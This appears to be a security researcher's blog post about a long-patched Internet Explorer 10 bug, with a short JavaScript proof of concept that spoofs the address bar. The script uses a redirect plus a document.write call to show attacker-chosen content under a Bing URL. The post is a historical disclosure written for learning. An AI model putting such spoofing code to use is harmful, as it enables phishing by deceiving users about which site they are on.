IE10 Address Bar Spoof via onreadystatechange and document.write

This spoof works against users with the default IE setting that shows a notification for every script error. By opening a new window that server-redirects to Bing, and hooking onreadystatechange to call document.write before the redirect completes, the page content gets replaced while the address bar retains the redirect target’s URL.

function main() {
    var win = window.open("redirect.aspx");
    win.setTimeout('document.onreadystatechange=function(){document.write(\'Check out the Address Bar!<h1>It has "bing" Spoofed!</h1><script>document.title="Bing";<\/script>\')};')
}

IE throws a script error at the document.write call during the readystate change, then — crucially — shows the Bing URL in the address bar while displaying the attacker’s custom content. The error notification is a side effect of IE catching the timing violation, but it leaves the spoof intact. Users who had disabled script error notifications would not see the spoof. Tested on Win8 RTM IE10 Desktop UI.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 on Windows Phone 8: designMode Disables Scripts Globally] :: [VBScript Cross-Origin Variable Existence Detection and Error Injection] >